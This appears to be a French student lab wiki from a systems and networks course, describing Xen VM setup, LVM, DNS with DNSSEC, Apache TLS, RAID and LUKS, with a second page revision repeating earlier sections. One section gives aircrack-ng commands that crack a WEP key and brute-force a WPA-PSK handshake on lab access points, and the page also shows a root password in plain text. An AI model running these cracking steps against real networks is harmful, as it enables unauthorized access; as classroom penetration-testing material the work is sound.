 root@capbreton:~# vgdisplay&lt;br /&gt;
  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  152&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                26&lt;br /&gt;
  Open LV               16&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       50176 / 196.00 GiB&lt;br /&gt;
  Free  PE / Size       1380350 / &amp;lt;5.27 TiB&lt;br /&gt;
  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet1 storage&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet2 storage&lt;br /&gt;
&lt;br /&gt;
Il est nécessaire de les formater au format ext4 :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet1&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet2&lt;br /&gt;
&lt;br /&gt;
Dans notre fichier /etc/xen/Karmeliet.cfg, on doit indiquer que notre VM doit possèder les volumes logiques que l'on a créé auparavant (Karmeliet1 et Karmeliet2).&lt;br /&gt;
Il est, également, nécessaire d'indiquer le bridge IMA5sc.&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ vim /etc/xen/Karmeliet.cfg&lt;br /&gt;
 #Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet1,xvda3,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 #Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.179 ,mac=00:16:3E:5E:59:17 ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On lance la machine virtuelle :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ xl create -c /etc/xen/Karmeliet.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On doit créer xvda3 et xvda4 pour nos répertoires var et home:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda4&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Le répertoire var doit être placé dans le disque xvda4 :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, il est nécesaire d'ajouter les lignes ci-dessous pour pouvoir monter les disques par la suite:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
La commande suivant permet de monter les disques :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mount -a&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que le montage s'est faite correctement, on peut voir avec la commande lsblk si les partitions sont bien visibles :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ lsblk&lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
Pour accéder à notre VM :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# xen console Karmeliet&lt;br /&gt;
&lt;br /&gt;
=Services Internet=&lt;br /&gt;
==Connexion ssh==&lt;br /&gt;
&lt;br /&gt;
Pour se connecter en ssh, nous allons dans le fichier se trouvant au chemin :&lt;br /&gt;
 /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
On décommente Port et PermitRootLogin et on leur donne la valeur :&lt;br /&gt;
&lt;br /&gt;
 Port 22222&lt;br /&gt;
 PermitRootLogin Yes&lt;br /&gt;
&lt;br /&gt;
On a plus qu'à se connecter via ssh  : &lt;br /&gt;
 ssh root@193.48.57.179 -p 22222&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==DNS==&lt;br /&gt;
&lt;br /&gt;
On réserve un nom de domaine sur ghandi.net, en l'occurrence le notre sera : &lt;br /&gt;
 karmeliet.site&lt;br /&gt;
&lt;br /&gt;
On rentre notre adresse IPv4 dans le &amp;quot;Glue records&amp;quot;&lt;br /&gt;
 193.48.57.179&lt;br /&gt;
&lt;br /&gt;
On ajoute nos DNS primaire et secondaire pour obtenir un nom de serveur&lt;br /&gt;
 ns1.karmeliet.site (primaire)&lt;br /&gt;
 ns6.gandi.net (secondaire)&lt;br /&gt;
&lt;br /&gt;
===Configuration de bind9===&lt;br /&gt;
&lt;br /&gt;
On installe les paquets&lt;br /&gt;
 apt install bind9&lt;br /&gt;
&lt;br /&gt;
On change le fichier /etc/resolv.conf&lt;br /&gt;
 nameserver 127.0.0.1&lt;br /&gt;
&lt;br /&gt;
On va configurer notre DNS primaire dans le fichier de configuration /etc/bind/named.conf.local&lt;br /&gt;
De plus, on autorise le transfert d'information avec le DNS Secondaire (217.70.177.40)&lt;br /&gt;
 zone &amp;quot;karmeliet.site&amp;quot; {&lt;br /&gt;
   type master;&lt;br /&gt;
   file &amp;quot;/etc/bind/db.karmeliet.site&amp;quot;;&lt;br /&gt;
   allow-transfer { 217.70.177.40; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
On créé un fichier db.karmeliet.site ayant le même template que db.local &lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.karmeliet.site.  postmaster.karmeliet.site(&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.karmeliet.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.179&lt;br /&gt;
&lt;br /&gt;
==Sécurisation de serveur DNS par DNSSEC==&lt;br /&gt;
&lt;br /&gt;
On ajoute dans le fichier named.conf.options&lt;br /&gt;
 dnssec-enable yes; &lt;br /&gt;
&lt;br /&gt;
On va dans le dossier bind&lt;br /&gt;
 /etc/bind&lt;br /&gt;
&lt;br /&gt;
On crée le dossier karmeliet.site.dnssec&lt;br /&gt;
 mkdir karmeliet.site.dnssec&lt;br /&gt;
&lt;br /&gt;
On crée la clef asymétrique de signature de clefs de zone&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE karmeliet.site&lt;br /&gt;
&lt;br /&gt;
On crée la clef asymétrique de la zone pour signer les enregistrements&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1024 -n ZONE karmeliet.site&lt;br /&gt;
&lt;br /&gt;
On renomme les deux paires de clefs avec le nom de notre zone en ajoutant -ksk et -zsk pour les clefs correspondantes.&lt;br /&gt;
&lt;br /&gt;
On inclue les clefs publiques dans votre fichier de zone db.karmeliet.site et on incrémente le numéro de version de la zone&lt;br /&gt;
 $include /etc/bind/karmeliet.site.dnssec/karmeliet.site-ksk.key&lt;br /&gt;
 $include /etc/bind/karmeliet.site.dnssec/karmeliet.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
On signe les enregistrements de la zone&lt;br /&gt;
 dnssec-signzone -o karmeliet.site -k karmeliet.site-ksk ../db.karmeliet.site karmeliet.site-zsk&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier named.conf.local pour utiliser la zone signée de suffixe db.karmeliet.site.signed;&lt;br /&gt;
&lt;br /&gt;
Il ne reste plus qu’à communiquer la partie publique de la KSK dans gandi.net&lt;br /&gt;
&lt;br /&gt;
==Certificat==&lt;br /&gt;
&lt;br /&gt;
Dans Gandi.net, on achète notre certificat en allant sur &lt;br /&gt;
 SSL certificate&lt;br /&gt;
&lt;br /&gt;
On nous demande une &amp;quot;Certificate Request&amp;quot; CSR que l'on a grâce à la commande &lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
On remplit les différentes informations que l'on nous demande et on récupère notre csr dans server.csr à la fin de la commande.&lt;br /&gt;
&lt;br /&gt;
On va sur la page de notre certificat pour gandi et on copie colle comme ceci dans notre fichier db.karmeliet.site pour que notre certficat soit valide&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.karmeliet.site.  postmaster.karmeliet.site(&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.karmeliet.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.179&lt;br /&gt;
 www	IN	A	193.48.57.179&lt;br /&gt;
 _D83578361950694C7CBA2CF57DDA0CE7.karmeliet.site. 10800 IN CNAME BEF099045291643A940FA49D11E8FB10.4CCF28E6A180333498A3F008A8B6CB32.0e21313c9c6df2403142.sectigo.com.&lt;br /&gt;
&lt;br /&gt;
==Serveur apache==&lt;br /&gt;
&lt;br /&gt;
On installe un serveur apache pour vérifier que tout fonctionne&lt;br /&gt;
 apt install apache2&lt;br /&gt;
&lt;br /&gt;
Pour installer apache correctement on a suivi les instructions sur ce site&lt;br /&gt;
 https://ubuntu.com/tutorials/install-and-configure-apache#1-overview&lt;br /&gt;
&lt;br /&gt;
Puis on a modifié notre fichier de configuration apache se trouvant dans /etc/apache2/sites-available&lt;br /&gt;
pour y mettre notre certificat :&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
         ServerAdmin webmaster@localhost&lt;br /&gt;
         DocumentRoot /var/www/karmeliet.site&lt;br /&gt;
         ServerName karmeliet.site&lt;br /&gt;
         ServerAlias www.karmeliet.site&lt;br /&gt;
         Redirect permanent / https://karmeliet.site/&lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt; &lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
         ServerAdmin webmaster@localhost&lt;br /&gt;
         DocumentRoot /var/www/karmeliet.site&lt;br /&gt;
         ServerName karmeliet.site&lt;br /&gt;
         ServerAlias www.karmeliet.site &lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /root/karmeliet.site.crt&lt;br /&gt;
         SSLCertificateKeyFile /root/karmeliet.site.key&lt;br /&gt;
 &lt;br /&gt;
         ErrorLog ${APACHE_LOG_DIR}/error.log&lt;br /&gt;
         CustomLog ${APACHE_LOG_DIR}/access.log combined&lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Sécurisation de serveur DNS par DNSSEC==&lt;br /&gt;
&lt;br /&gt;
= Tests d'intrusions =&lt;br /&gt;
&lt;br /&gt;
===5.2 Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
Cette commande sert à récupérer le nom de l'interface réseau:&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Notre interface réseau s'appelle &amp;quot;wlan0mon&amp;quot; (renommé automatiquement parce que celui de base était trop long)&lt;br /&gt;
 &lt;br /&gt;
On démarre l'interface sur le channel 3 :&lt;br /&gt;
 airmon-ng start wlan0mon 3&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID du point d'accès sur lequel on veut récupérer la clé WEP&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On réalise un test d'injection sur cracotte10&lt;br /&gt;
 aireplay-ng -9 -e cracotte10 -a 04:DA:D2:9C:50:59 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère les VI générés par le point d'accès pour les stocker dans output :&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:59 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
On effectue de fausses authentifications  &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte10 -a 04:DA:D2:9C:50:59 -h 40:A5:EF:D2:11:67 wlan0mon&lt;br /&gt;
&lt;br /&gt;
La clef WEP est alors décriptable :&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:59 output*.cap&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenu est le suivant :&lt;br /&gt;
 KEY FOUND! [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44 ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
===5.3  Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Comme pour le cassage de la clé WEP, on utilise aircrack-ng:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
On récupère le nom de notre interface qui est wlan0mon puis on le lance en mode moniteur sur le channel 7:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon 4&lt;br /&gt;
&lt;br /&gt;
Il nous faut un point d'accès pour pouvoir casser une clé WPA en récupérant son BSSID: &lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On choisit kracotte11 avec un BSSID 44:AD:D9:5F:87:0A, on récupère ce qu'on appelle &amp;quot;handshake&amp;quot; et on le sauvegarde dans un fichier sauv:&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 --bssid 44:AD:D9:5F:87:0A -w sauv wlan0mon&lt;br /&gt;
&lt;br /&gt;
On peut commencer le crackage:&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng sauv-01.cap -w dico.txt&lt;br /&gt;
&lt;br /&gt;
On obtiens après quelques heures le résultat :&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [ 59911999 ]&lt;br /&gt;
&lt;br /&gt;
 Master Key : EF A3 6F 02 E7 F1 DF 01 62 03 92 87 81 ED 99 6D &lt;br /&gt;
              25 28 7D D6 54 FC 29 41 5D BD E9 02 26 E7 F0 58&lt;br /&gt;
&lt;br /&gt;
=Réalisation=&lt;br /&gt;
&lt;br /&gt;
==Sécurisation de données==&lt;br /&gt;
&lt;br /&gt;
Nous créons trois partitions LVM de 1Go dans le groupe de volume storage avec comme noms celui de notre serveur&lt;br /&gt;
 lvcreate -L1G -n oronge-raid1 storage&lt;br /&gt;
 lvcreate -L1G -n oronge-raid2 storage&lt;br /&gt;
 lvcreate -L1G -n oronge-raid3 storage&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les partitions à notre fichier de configuration qui se trouve dans /etc/xen/Karmeliet.cfg&lt;br /&gt;
 'phy:/dev/storage/karmeliet.site-raid1,xvdb1,w',&lt;br /&gt;
 'phy:/dev/storage/karmeliet.site-raid2,xvdb2,w',&lt;br /&gt;
 'phy:/dev/storage/karmeliet.site-raid3,xvdb3,w'&lt;br /&gt;
&lt;br /&gt;
On éteint puis relance la VM et on crée la partition Raid&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdb1 /dev/xvdb2 /dev/xvdb3&lt;br /&gt;
&lt;br /&gt;
On formate la partition en ext4&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
On ajoute au fichier /etc/fstab la partition formaté /dev/md0 pour qu'il soit monté durant le démarrage de la VM&lt;br /&gt;
 /dev/md0 /media/raid ext4 defaults 0 1&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
==Chiffrement de données==&lt;br /&gt;
&lt;br /&gt;
On installe avec apt cryptsetup&lt;br /&gt;
 apt install lvm2 cryptsetup&lt;br /&gt;
&lt;br /&gt;
On regarde où est notre clé usb grâce à la commande lsblk, dans notre cas elle est dans sdb&lt;br /&gt;
&lt;br /&gt;
On la formatte &lt;br /&gt;
 mkfs.ext4 /dev/sdb&lt;br /&gt;
&lt;br /&gt;
On initialise notre clé USB avec l'option luksFormat et on choisis un mot de passe &lt;br /&gt;
 cryptsetup luksFormat /dev/sdb&lt;br /&gt;
&lt;br /&gt;
On ouvre notre partition chiffrée avec luksOpen (le nom du volume sera karmeliet_crypted) et on la formatte :&lt;br /&gt;
 cryptsetup luksOpen /dev/sdc karmeliet_crypted&lt;br /&gt;
 mkfs.ext4 /dev/mapper/karmeliet_crypted&lt;br /&gt;
&lt;br /&gt;
On monte la partition &lt;br /&gt;
 mkdir /mnt/karmelietCrypte&lt;br /&gt;
 mount -t ext4 /dev/mapper/karmeliet_crypted /mnt/karmelietCrypte/ &lt;br /&gt;
&lt;br /&gt;
On y ajoute un fichier texte hello dans lequel on  écrit &amp;quot;cc&amp;quot; puis on démonte la clé et on ferme le volume chiffré&lt;br /&gt;
 umount /mnt/karmelietCrypte&lt;br /&gt;
 cryptsetup luksClose karmeliet_crypted&lt;br /&gt;
&lt;br /&gt;
On a plus qu'a aller tester notre clé USB en la montant sur l'ordinateur d'un autre binôme et cela nous demande bien de rentrer un mot de passe notre clé est chiffré.&lt;br /&gt;
&lt;br /&gt;
=Ferme de serveurs Web=&lt;br /&gt;
&lt;br /&gt;
==ASR lab project==&lt;br /&gt;
&lt;br /&gt;
Se connecter à notre VM pra-04&lt;br /&gt;
 xen console /etc/xen/pra-04.cfg&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier /etc/network/interfaces&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 172.26.145.104&lt;br /&gt;
 gateway 172.26.145.254&lt;br /&gt;
 netmask 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
On ping sur notre zabeth pour savoir s'il communique bien ensemble&lt;br /&gt;
 ping 172.26.145.58&lt;br /&gt;
&lt;br /&gt;
On clone le git sur la zabeth puis on travaille dans le dossier&lt;br /&gt;
 git clone https://github.com/thomas-maurice/polytech-asr-lab.git&lt;br /&gt;
&lt;br /&gt;
On génère sur la zabeth une clé ssh&lt;br /&gt;
 ssh-keygen -t ed25519 -f ~/.ssh/id_ed25519 -C &amp;quot;selim.bensalem@polytech-lille.net&amp;quot; -P ''&lt;br /&gt;
&lt;br /&gt;
Sur la zabeth, on rajoute au fichier authorized_keys la clé ssh précédemment créée et sur la VM, on crée un fichier authorized_keys avec la même clé&lt;br /&gt;
&lt;br /&gt;
On ajoute un role ssh_key&lt;br /&gt;
 - name: &amp;quot;Deploy ssh_keys&amp;quot;&lt;br /&gt;
  template:&lt;br /&gt;
    src: authorized_keys.j2&lt;br /&gt;
    dest: /root/.ssh/authorized_keys&lt;br /&gt;
    owner: root&lt;br /&gt;
    group: root&lt;br /&gt;
    mode: '0600&lt;br /&gt;
&lt;br /&gt;
On crée une template pour copier tous les clés dans authorized_keys de la VM&lt;br /&gt;
  % for ssh_key in ssh_keys%}&lt;br /&gt;
 {{ssh_key[&amp;quot;key&amp;quot;]}}&lt;br /&gt;
 {% endfor %}&lt;br /&gt;
&lt;br /&gt;
On lance ansible&lt;br /&gt;
 ansible-playbook -v -i inventory polytech.yaml&lt;/div&gt;</summary>
		<author><name>Sbensale</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=57949</id>
		<title>TP sysres IMA5 2021/2022 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=57949"/>
				<updated>2022-01-12T11:42:45Z</updated>
		
		<summary type="html">&lt;p&gt;Sbensale : /* Chiffrement de données */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Cablage Réseau=&lt;br /&gt;
&lt;br /&gt;
=Machine Virtuelle=&lt;br /&gt;
&lt;br /&gt;
==Création de la machine virtuelle==&lt;br /&gt;
&lt;br /&gt;
Commande pour la création de la machine virtuelle:&lt;br /&gt;
 root@capbreton:~$ xen-create-image --hostname=Karmeliet --ip=193.48.57.179 --gateway=193.48.57.187 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
On créé 2 LV de 10 Go pour les allouer plus tard mais pour cela nous devons d'abord voir quel volume groupe choisir (on choisit celui qui dispose du plus grand espace).&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# vgdisplay&lt;br /&gt;
  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  152&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                26&lt;br /&gt;
  Open LV               16&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       50176 / 196.00 GiB&lt;br /&gt;
  Free  PE / Size       1380350 / &amp;lt;5.27 TiB&lt;br /&gt;
  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet1 storage&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet2 storage&lt;br /&gt;
&lt;br /&gt;
Il est nécessaire de les formater au format ext4 :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet1&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet2&lt;br /&gt;
&lt;br /&gt;
Dans notre fichier /etc/xen/Karmeliet.cfg, on doit indiquer que notre VM doit possèder les volumes logiques que l'on a créé auparavant (Karmeliet1 et Karmeliet2).&lt;br /&gt;
Il est, également, nécessaire d'indiquer le bridge IMA5sc.&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ vim /etc/xen/Karmeliet.cfg&lt;br /&gt;
 #Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet1,xvda3,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 #Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.179 ,mac=00:16:3E:5E:59:17 ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On lance la machine virtuelle :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ xl create -c /etc/xen/Karmeliet.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On doit créer xvda3 et xvda4 pour nos répertoires var et home:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda4&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Le répertoire var doit être placé dans le disque xvda4 :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, il est nécesaire d'ajouter les lignes ci-dessous pour pouvoir monter les disques par la suite:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
La commande suivant permet de monter les disques :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mount -a&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que le montage s'est faite correctement, on peut voir avec la commande lsblk si les partitions sont bien visibles :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ lsblk&lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
Pour accéder à notre VM :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# xen console Karmeliet&lt;br /&gt;
&lt;br /&gt;
=Services Internet=&lt;br /&gt;
==Connexion ssh==&lt;br /&gt;
&lt;br /&gt;
Pour se connecter en ssh, nous allons dans le fichier se trouvant au chemin :&lt;br /&gt;
 /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
On décommente Port et PermitRootLogin et on leur donne la valeur :&lt;br /&gt;
&lt;br /&gt;
 Port 22222&lt;br /&gt;
 PermitRootLogin Yes&lt;br /&gt;
&lt;br /&gt;
On a plus qu'à se connecter via ssh  : &lt;br /&gt;
 ssh root@193.48.57.179 -p 22222&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==DNS==&lt;br /&gt;
&lt;br /&gt;
On réserve un nom de domaine sur ghandi.net, en l'occurrence le notre sera : &lt;br /&gt;
 karmeliet.site&lt;br /&gt;
&lt;br /&gt;
On rentre notre adresse IPv4 dans le &amp;quot;Glue records&amp;quot;&lt;br /&gt;
 193.48.57.179&lt;br /&gt;
&lt;br /&gt;
On ajoute nos DNS primaire et secondaire pour obtenir un nom de serveur&lt;br /&gt;
 ns1.karmeliet.site (primaire)&lt;br /&gt;
 ns6.gandi.net (secondaire)&lt;br /&gt;
&lt;br /&gt;
===Configuration de bind9===&lt;br /&gt;
&lt;br /&gt;
On installe les paquets&lt;br /&gt;
 apt install bind9&lt;br /&gt;
&lt;br /&gt;
On change le fichier /etc/resolv.conf&lt;br /&gt;
 nameserver 127.0.0.1&lt;br /&gt;
&lt;br /&gt;
On va configurer notre DNS primaire dans le fichier de configuration /etc/bind/named.conf.local&lt;br /&gt;
De plus, on autorise le transfert d'information avec le DNS Secondaire (217.70.177.40)&lt;br /&gt;
 zone &amp;quot;karmeliet.site&amp;quot; {&lt;br /&gt;
   type master;&lt;br /&gt;
   file &amp;quot;/etc/bind/db.karmeliet.site&amp;quot;;&lt;br /&gt;
   allow-transfer { 217.70.177.40; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
On créé un fichier db.karmeliet.site ayant le même template que db.local &lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.karmeliet.site.  postmaster.karmeliet.site(&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.karmeliet.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.179&lt;br /&gt;
&lt;br /&gt;
==Sécurisation de serveur DNS par DNSSEC==&lt;br /&gt;
&lt;br /&gt;
On ajoute dans le fichier named.conf.options&lt;br /&gt;
 dnssec-enable yes; &lt;br /&gt;
&lt;br /&gt;
On va dans le dossier bind&lt;br /&gt;
 /etc/bind&lt;br /&gt;
&lt;br /&gt;
